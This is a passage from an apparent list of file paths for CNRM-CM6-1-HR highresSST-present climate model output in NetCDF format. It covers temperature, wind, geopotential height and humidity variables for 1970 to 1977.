'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19701231.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19711231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197012.nc',
'v20170518_1970/ua_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101-197112.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197012.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101-197112.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19700131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700201-19700228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700301-19700331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700401-19700430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700501-19700531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700601-19700630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700801-19700831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700701-19700731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701001-19701031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700901-19700930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701101-19701130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19701201-19701231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19710131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710301-19710331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710201-19710228.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710401-19710430.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710501-19710531.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710601-19710630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710701-19710731.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710901-19710930.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710801-19710831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711001-19711031.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711101-19711130.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19711201-19711231.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197012312359.nc',
'v20170518_1970/zg500_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197112312359.nc',
'v20170518_1970/hus_Emon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001-197912.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197301010000-197301312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197302010000-197302282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197303010000-197303312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197304010000-197304302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197305010000-197305312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197306010000-197306302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197307010000-197307312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197308010000-197308312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197309010000-197309302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197310010000-197310312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197311010000-197311302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197312010000-197312312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197401010000-197401312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197402010000-197402282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197403010000-197403312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197404010000-197404302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197405010000-197405312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197406010000-197406302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197407010000-197407312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197601010000-197601312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197408010000-197408312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197602010000-197602292359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197409010000-197409302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197603010000-197603312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197410010000-197410312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197604010000-197604302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197411010000-197411302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197605010000-197605312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197412010000-197412312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197606010000-197606302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197501010000-197501312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197607010000-197607312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197502010000-197502282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197608010000-197608312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197503010000-197503312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197609010000-197609302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197504010000-197504302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197610010000-197610312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197505010000-197505312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197611010000-197611302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197506010000-197506302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197612010000-197612312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197507010000-197507312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197701010000-197701312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197508010000-197508312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197702010000-197702282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197509010000-197509302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197703010000-197703312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197510010000-197510312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197704010000-197704302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197511010000-197511302359.nc',
